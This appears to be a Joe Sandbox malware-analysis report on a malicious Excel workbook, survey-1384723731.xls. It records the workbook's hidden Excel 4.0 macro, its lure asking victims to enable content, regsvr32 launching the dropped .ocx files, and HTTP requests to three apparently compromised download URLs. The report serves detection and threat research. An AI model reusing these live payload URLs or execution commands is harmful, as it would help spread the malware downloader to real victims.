Loading ...

Play interactive tourEdit tour

Windows Analysis Report survey-1384723731.xls

Overview

General Information

Sample Name:survey-1384723731.xls
Analysis ID:528587
MD5:00bec62d14bc9f8a32948f2c6c512a8f
SHA1:d2ef80f029f8f035947f1bc6f5929d225374dda4
SHA256:59d14a53849a19d0dd5ccaf63a85955adbd313c9ec7d92422c0fcdda357b8ce0
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Yara signature match
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 408 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2192 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2604 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1184 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
survey-1384723731.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x3b2aa:$s1: Excel
  • 0x3c378:$s1: Excel
  • 0x3521:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
survey-1384723731.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\survey-1384723731.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x3b2aa:$s1: Excel
    • 0x3c378:$s1: Excel
    • 0x3521:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\survey-1384723731.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 408, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, ProcessId: 2192

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 192.185.79.2:443 -> 192.168.2.22:49167 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 192.185.129.7:443 -> 192.168.2.22:49168 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.247.11.218:443 -> 192.168.2.22:49169 version: TLS 1.2

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.185.79.2:443
      Source: global trafficDNS query: name: klevvrtech.com
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.185.79.2:443
      Source: global trafficHTTP traffic detected: GET /zxywJAC24KJ/ji.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: klevvrtech.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /OYcMRJbL/ji.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: srkcampus.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /fbmKk6n48G/ji.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rstebet.co.idConnection: Keep-Alive
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: Joe Sandbox ViewIP Address: 192.185.129.7 192.185.129.7
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
      Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: regsvr32.exe, 00000003.00000002.447880847.0000000003A80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444010590.0000000003A90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437079532.00000000039E0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: regsvr32.exe, 00000003.00000002.447092500.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443656865.0000000001D20000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: regsvr32.exe, 00000003.00000002.447880847.0000000003A80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444010590.0000000003A90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437079532.00000000039E0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ji[1].htmJump to behavior
      Source: unknownDNS traffic detected: queries for: klevvrtech.com
      Source: global trafficHTTP traffic detected: GET /zxywJAC24KJ/ji.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: klevvrtech.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /OYcMRJbL/ji.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: srkcampus.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /fbmKk6n48G/ji.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rstebet.co.idConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 192.185.79.2:443 -> 192.168.2.22:49167 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 192.185.129.7:443 -> 192.168.2.22:49168 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.247.11.218:443 -> 192.168.2.22:49169 version: TLS 1.2

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable Editing 18 19 I OK I 20 (D PROTECTED VIEW Be careful- files from the 1nterne cted View.
      Source: Screenshot number: 4Screenshot OCR: Enable Content 25 26 G) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
      Source: Screenshot number: 8Screenshot OCR: Enable Editing 18 19 20 (D PROTECTED VIEW Be careful- files from the Internet can contain viruses
      Source: Screenshot number: 8Screenshot OCR: Enable Content 25 26 G) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
      Source: Document image extraction number: 0Screenshot OCR: Enable Editing 0 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
      Source: Document image extraction number: 0Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
      Source: Document image extraction number: 1Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
      Source: Document image extraction number: 1Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
      Source: Screenshot number: 12Screenshot OCR: Enable Editing d 18 19 20 (D PROTECTED VIEW Be careful - files from the Internet can contain viru
      Source: Screenshot number: 12Screenshot OCR: Enable Content 25 26 G) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
      Source: survey-1384723731.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: C:\Users\user\Desktop\survey-1384723731.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: survey-1384723731.xlsMacro extractor: Sheet name: Buk1
      Source: survey-1384723731.xlsMacro extractor: Sheet name: Buk4
      Source: survey-1384723731.xlsMacro extractor: Sheet name: Buk6
      Source: survey-1384723731.xlsMacro extractor: Sheet name: Buk7
      Source: survey-1384723731.xlsMacro extractor: Sheet name: Buk2
      Source: survey-1384723731.xlsMacro extractor: Sheet name: Buk3
      Source: survey-1384723731.xlsOLE indicator, VBA macros: true
      Source: survey-1384723731.xls.0.drOLE indicator, VBA macros: true
      Source: 91C4.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: survey-1384723731.xlsOLE indicator, Workbook stream: true
      Source: survey-1384723731.xls.0.drOLE indicator, Workbook stream: true
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocxJump to behavior
      Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE80D.tmpJump to behavior
      Source: classification engineClassification label: mal64.expl.winXLS@7/4@3/3
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: 91C4.tmp.0.drInitial sample: OLE indicators vbamacros = False
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 2980Thread sleep count: 63 > 30Jump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 2968Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 1200Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 2824Thread sleep time: -60000s >= -30000sJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Yara detected hidden Macro 4.0 in ExcelShow sources
      Source: Yara matchFile source: survey-1384723731.xls, type: SAMPLE
      Source: Yara matchFile source: C:\Users\user\Desktop\survey-1384723731.xls, type: DROPPED

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting1Path InterceptionProcess Injection1Disable or Modify Tools1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer2SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      klevvrtech.com0%VirustotalBrowse
      rstebet.co.id0%VirustotalBrowse
      srkcampus.org0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      https://klevvrtech.com/zxywJAC24KJ/ji.html2%VirustotalBrowse
      https://klevvrtech.com/zxywJAC24KJ/ji.html0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      https://srkcampus.org/OYcMRJbL/ji.html0%Avira URL Cloudsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe
      https://rstebet.co.id/fbmKk6n48G/ji.html2%VirustotalBrowse
      https://rstebet.co.id/fbmKk6n48G/ji.html0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      klevvrtech.com
      192.185.79.2
      truefalseunknown
      rstebet.co.id
      103.247.11.218
      truefalseunknown
      srkcampus.org
      192.185.129.7
      truefalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://klevvrtech.com/zxywJAC24KJ/ji.htmlfalse
      • 2%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://srkcampus.org/OYcMRJbL/ji.htmlfalse
      • Avira URL Cloud: safe
      unknown
      https://rstebet.co.id/fbmKk6n48G/ji.htmlfalse
      • 2%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmpfalse
        high
        http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmpfalse
          high
          http://investor.msn.comregsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmpfalse
              high
              http://www.icra.org/vocabulary/.regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.447880847.0000000003A80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444010590.0000000003A90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437079532.00000000039E0000.00000002.00020000.sdmpfalse
                high
                http://investor.msn.com/regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmpfalse
                  high
                  http://www.%s.comPAregsvr32.exe, 00000003.00000002.447880847.0000000003A80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444010590.0000000003A90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437079532.00000000039E0000.00000002.00020000.sdmpfalse
                  • URL Reputation: safe
                  low
                  http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.hotmail.com/oeregsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmpfalse
                    high
                    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.447092500.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443656865.0000000001D20000.00000002.00020000.sdmpfalse
                    • Avira URL Cloud: safe
                    low

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    192.185.129.7
                    srkcampus.orgUnited States
                    46606UNIFIEDLAYER-AS-1USfalse
                    192.185.79.2
                    klevvrtech.comUnited States
                    46606UNIFIEDLAYER-AS-1USfalse
                    103.247.11.218
                    rstebet.co.idIndonesia
                    58487RUMAHWEB-AS-IDRumahwebIndonesiaCVIDfalse

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528587
                    Start date:25.11.2021
                    Start time:14:30:13
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 42s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:survey-1384723731.xls
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:7
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal64.expl.winXLS@7/4@3/3
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xls
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    14:30:31API Interceptor92x Sleep call for process: regsvr32.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    192.185.129.7survey-1378794827.xlsGet hashmaliciousBrowse
                      doc-904268081.xlsGet hashmaliciousBrowse
                        doc-904268081.xlsGet hashmaliciousBrowse
